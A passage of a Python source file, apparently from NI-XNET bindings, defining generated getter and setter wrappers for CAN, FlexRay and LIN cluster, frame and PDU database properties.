_cconsts.NX_PROP_CLST_SIG_REFS,
)
def get_cluster_can_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_IO_MODE,
)
def set_cluster_can_io_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_IO_MODE,
value,
)
def get_cluster_can_fd_baud_rate(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE,
)
def set_cluster_can_fd_baud_rate(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE,
value,
)
def get_cluster_can_fd_baud_rate64(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u64(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE64,
)
def set_cluster_can_fd_baud_rate64(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u64(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_BAUD_RATE64,
value,
)
def get_cluster_flex_ray_act_pt_off(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ACT_PT_OFF,
)
def set_cluster_flex_ray_act_pt_off(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ACT_PT_OFF,
value,
)
def get_cluster_flex_ray_cas_rx_l_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CAS_RX_L_MAX,
)
def set_cluster_flex_ray_cas_rx_l_max(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CAS_RX_L_MAX,
value,
)
def get_cluster_flex_ray_channels(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CHANNELS,
)
def set_cluster_flex_ray_channels(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CHANNELS,
value,
)
def get_cluster_flex_ray_clst_drift_dmp(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CLST_DRIFT_DMP,
)
def set_cluster_flex_ray_clst_drift_dmp(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CLST_DRIFT_DMP,
value,
)
def get_cluster_flex_ray_cold_st_ats(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_COLD_ST_ATS,
)
def set_cluster_flex_ray_cold_st_ats(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_COLD_ST_ATS,
value,
)
def get_cluster_flex_ray_cycle(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CYCLE,
)
def set_cluster_flex_ray_cycle(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_CYCLE,
value,
)
def get_cluster_flex_ray_dyn_seg_start(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_DYN_SEG_START,
)
def get_cluster_flex_ray_dyn_slot_idl_ph(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_DYN_SLOT_IDL_PH,
)
def set_cluster_flex_ray_dyn_slot_idl_ph(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_DYN_SLOT_IDL_PH,
value,
)
def get_cluster_flex_ray_latest_usable_dyn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LATEST_USABLE_DYN,
)
def get_cluster_flex_ray_latest_guar_dyn(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LATEST_GUAR_DYN,
)
def get_cluster_flex_ray_lis_noise(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LIS_NOISE,
)
def set_cluster_flex_ray_lis_noise(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_LIS_NOISE,
value,
)
def get_cluster_flex_ray_macro_per_cycle(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MACRO_PER_CYCLE,
)
def set_cluster_flex_ray_macro_per_cycle(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MACRO_PER_CYCLE,
value,
)
def get_cluster_flex_ray_macrotick(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MACROTICK,
)
def get_cluster_flex_ray_max_wo_clk_cor_fat(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_FAT,
)
def set_cluster_flex_ray_max_wo_clk_cor_fat(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_FAT,
value,
)
def get_cluster_flex_ray_max_wo_clk_cor_pas(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_PAS,
)
def set_cluster_flex_ray_max_wo_clk_cor_pas(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MAX_WO_CLK_COR_PAS,
value,
)
def get_cluster_flex_ray_minislot_act_pt(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT_ACT_PT,
)
def set_cluster_flex_ray_minislot_act_pt(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT_ACT_PT,
value,
)
def get_cluster_flex_ray_minislot(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT,
)
def set_cluster_flex_ray_minislot(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_MINISLOT,
value,
)
def get_cluster_flex_ray_nm_vec_len(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NM_VEC_LEN,
)
def set_cluster_flex_ray_nm_vec_len(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NM_VEC_LEN,
value,
)
def get_cluster_flex_ray_nit(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NIT,
)
def set_cluster_flex_ray_nit(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NIT,
value,
)
def get_cluster_flex_ray_nit_start(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NIT_START,
)
def get_cluster_flex_ray_num_minislt(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_MINISLT,
)
def set_cluster_flex_ray_num_minislt(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_MINISLT,
value,
)
def get_cluster_flex_ray_num_stat_slt(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_STAT_SLT,
)
def set_cluster_flex_ray_num_stat_slt(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_NUM_STAT_SLT,
value,
)
def get_cluster_flex_ray_off_cor_st(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_OFF_COR_ST,
)
def set_cluster_flex_ray_off_cor_st(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_OFF_COR_ST,
value,
)
def get_cluster_flex_ray_payld_len_dyn_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_DYN_MAX,
)
def set_cluster_flex_ray_payld_len_dyn_max(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_DYN_MAX,
value,
)
def get_cluster_flex_ray_payld_len_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_MAX,
)
def get_cluster_flex_ray_payld_len_st(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_ST,
)
def set_cluster_flex_ray_payld_len_st(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_PAYLD_LEN_ST,
value,
)
def get_cluster_flex_ray_stat_slot(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_STAT_SLOT,
)
def set_cluster_flex_ray_stat_slot(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_STAT_SLOT,
value,
)
def get_cluster_flex_ray_sym_win(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYM_WIN,
)
def set_cluster_flex_ray_sym_win(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYM_WIN,
value,
)
def get_cluster_flex_ray_sym_win_start(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYM_WIN_START,
)
def get_cluster_flex_ray_sync_node_max(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYNC_NODE_MAX,
)
def set_cluster_flex_ray_sync_node_max(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_SYNC_NODE_MAX,
value,
)
def get_cluster_flex_ray_tss_tx(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_TSS_TX,
)
def set_cluster_flex_ray_tss_tx(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_TSS_TX,
value,
)
def get_cluster_flex_ray_wake_sym_rx_idl(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_IDL,
)
def set_cluster_flex_ray_wake_sym_rx_idl(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_IDL,
value,
)
def get_cluster_flex_ray_wake_sym_rx_low(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_LOW,
)
def set_cluster_flex_ray_wake_sym_rx_low(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_LOW,
value,
)
def get_cluster_flex_ray_wake_sym_rx_win(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_WIN,
)
def set_cluster_flex_ray_wake_sym_rx_win(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_RX_WIN,
value,
)
def get_cluster_flex_ray_wake_sym_tx_idl(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_IDL,
)
def set_cluster_flex_ray_wake_sym_tx_idl(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_IDL,
value,
)
def get_cluster_flex_ray_wake_sym_tx_low(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_LOW,
)
def set_cluster_flex_ray_wake_sym_tx_low(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_WAKE_SYM_TX_LOW,
value,
)
def get_cluster_flex_ray_use_wakeup(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_USE_WAKEUP,
)
def set_cluster_flex_ray_use_wakeup(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_USE_WAKEUP,
value,
)
def get_cluster_lin_schedules(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_CLST_LIN_SCHEDULES,
)
def get_cluster_lin_tick(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_CLST_LIN_TICK,
)
def set_cluster_lin_tick(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_CLST_LIN_TICK,
value,
)
def get_cluster_flex_ray_alw_pass_act(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ALW_PASS_ACT,
)
def set_cluster_flex_ray_alw_pass_act(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_FLEX_RAY_ALW_PASS_ACT,
value,
)
def get_cluster_application_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_APPLICATION_PROTOCOL,
)
def set_cluster_application_protocol(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_CLST_APPLICATION_PROTOCOL,
value,
)
def get_cluster_can_fd_iso_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_CLST_CAN_FD_ISO_MODE,
)
def get_frame_application_protocol(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_APPLICATION_PROTOCOL,
)
def set_frame_application_protocol(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_APPLICATION_PROTOCOL,
value,
)
def get_frame_cluster_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_FRM_CLUSTER_REF,
)
def get_frame_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_FRM_COMMENT,
)
def set_frame_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_FRM_COMMENT,
value,
)
def get_frame_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_CONFIG_STATUS,
)
def get_frame_default_payload(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u8_array(
ref,
_cconsts.NX_PROP_FRM_DEFAULT_PAYLOAD,
)
def set_frame_default_payload(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u8_array(
ref,
_cconsts.NX_PROP_FRM_DEFAULT_PAYLOAD,
value,
)
def get_frame_id(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_ID,
)
def set_frame_id(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_ID,
value,
)
def get_frame_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_FRM_NAME,
)
def set_frame_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_FRM_NAME,
value,
)
def get_frame_payload_len(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_PAYLOAD_LEN,
)
def set_frame_payload_len(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_PAYLOAD_LEN,
value,
)
def get_frame_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_SIG_REFS,
)
def get_frame_can_ext_id(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_CAN_EXT_ID,
)
def set_frame_can_ext_id(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_CAN_EXT_ID,
value,
)
def get_frame_can_timing_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_CAN_TIMING_TYPE,
)
def set_frame_can_timing_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_CAN_TIMING_TYPE,
value,
)
def get_frame_can_tx_time(
ref, # type: int
):
# type: (...) -> float
return _cprops.get_database_f64(
ref,
_cconsts.NX_PROP_FRM_CAN_TX_TIME,
)
def set_frame_can_tx_time(
ref, # type: int
value, # type: float
):
# type: (...) -> None
_cprops.set_database_f64(
ref,
_cconsts.NX_PROP_FRM_CAN_TX_TIME,
value,
)
def get_frame_flex_ray_base_cycle(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_BASE_CYCLE,
)
def set_frame_flex_ray_base_cycle(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_BASE_CYCLE,
value,
)
def get_frame_flex_ray_ch_assign(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CH_ASSIGN,
)
def set_frame_flex_ray_ch_assign(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CH_ASSIGN,
value,
)
def get_frame_flex_ray_cycle_rep(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CYCLE_REP,
)
def set_frame_flex_ray_cycle_rep(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_CYCLE_REP,
value,
)
def get_frame_flex_ray_preamble(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_PREAMBLE,
)
def set_frame_flex_ray_preamble(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_PREAMBLE,
value,
)
def get_frame_flex_ray_startup(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_STARTUP,
)
def set_frame_flex_ray_startup(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_STARTUP,
value,
)
def get_frame_flex_ray_sync(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_SYNC,
)
def set_frame_flex_ray_sync(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_SYNC,
value,
)
def get_frame_flex_ray_timing_type(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_TIMING_TYPE,
)
def set_frame_flex_ray_timing_type(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_TIMING_TYPE,
value,
)
def get_frame_flex_ray_in_cyc_rep_enabled(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_ENABLED,
)
def get_frame_flex_ray_in_cyc_rep_i_ds(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_I_DS,
)
def set_frame_flex_ray_in_cyc_rep_i_ds(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_I_DS,
value,
)
def get_frame_flex_ray_in_cyc_rep_ch_assigns(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_CH_ASSIGNS,
)
def set_frame_flex_ray_in_cyc_rep_ch_assigns(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_FLEX_RAY_IN_CYC_REP_CH_ASSIGNS,
value,
)
def get_frame_lin_checksum(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_LIN_CHECKSUM,
)
def get_frame_mux_is_muxed(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_MUX_IS_MUXED,
)
def get_frame_mux_data_mux_sig_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_FRM_MUX_DATA_MUX_SIG_REF,
)
def get_frame_mux_static_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_MUX_STATIC_SIG_REFS,
)
def get_frame_mux_subframe_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_MUX_SUBFRAME_REFS,
)
def get_frame_pdu_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_PDU_REFS,
)
def set_frame_pdu_refs(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_ref_array(
ref,
_cconsts.NX_PROP_FRM_PDU_REFS,
value,
)
def get_frame_pdu_start_bits(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_START_BITS,
)
def set_frame_pdu_start_bits(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_START_BITS,
value,
)
def get_frame_pdu_update_bits(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_UPDATE_BITS,
)
def set_frame_pdu_update_bits(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u32_array(
ref,
_cconsts.NX_PROP_FRM_PDU_UPDATE_BITS,
value,
)
def get_frame_variable_payload(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_FRM_VARIABLE_PAYLOAD,
)
def set_frame_variable_payload(
ref, # type: int
value, # type: bool
):
# type: (...) -> None
_cprops.set_database_bool(
ref,
_cconsts.NX_PROP_FRM_VARIABLE_PAYLOAD,
value,
)
def get_frame_can_io_mode(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_FRM_CA_NIO_MODE,
)
def set_frame_can_io_mode(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_FRM_CA_NIO_MODE,
value,
)
def get_pdu_cluster_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_PDU_CLUSTER_REF,
)
def get_pdu_default_payload(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_u8_array(
ref,
_cconsts.NX_PROP_PDU_DEFAULT_PAYLOAD,
)
def set_pdu_default_payload(
ref, # type: int
value, # type: typing.List[int]
):
# type: (...) -> None
_cprops.set_database_u8_array(
ref,
_cconsts.NX_PROP_PDU_DEFAULT_PAYLOAD,
value,
)
def get_pdu_comment(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_PDU_COMMENT,
)
def set_pdu_comment(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_PDU_COMMENT,
value,
)
def get_pdu_config_status(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_PDU_CONFIG_STATUS,
)
def get_pdu_frm_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_FRM_REFS,
)
def get_pdu_name(
ref, # type: int
):
# type: (...) -> typing.Text
return _cprops.get_database_string(
ref,
_cconsts.NX_PROP_PDU_NAME,
)
def set_pdu_name(
ref, # type: int
value, # type: typing.Text
):
# type: (...) -> None
_cprops.set_database_string(
ref,
_cconsts.NX_PROP_PDU_NAME,
value,
)
def get_pdu_payload_len(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_u32(
ref,
_cconsts.NX_PROP_PDU_PAYLOAD_LEN,
)
def set_pdu_payload_len(
ref, # type: int
value, # type: int
):
# type: (...) -> None
_cprops.set_database_u32(
ref,
_cconsts.NX_PROP_PDU_PAYLOAD_LEN,
value,
)
def get_pdu_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_SIG_REFS,
)
def get_pdu_mux_is_muxed(
ref, # type: int
):
# type: (...) -> bool
return _cprops.get_database_bool(
ref,
_cconsts.NX_PROP_PDU_MUX_IS_MUXED,
)
def get_pdu_mux_data_mux_sig_ref(
ref, # type: int
):
# type: (...) -> int
return _cprops.get_database_ref(
ref,
_cconsts.NX_PROP_PDU_MUX_DATA_MUX_SIG_REF,
)
def get_pdu_mux_static_sig_refs(
ref, # type: int
):
# type: (...) -> typing.Iterable[int]
return _cprops.get_database_ref_array(
ref,
_cconsts.NX_PROP_PDU_MUX_STATIC_SIG_REFS,
)
def get_pdu_mux_subframe_refs(
ref, # type: int
):
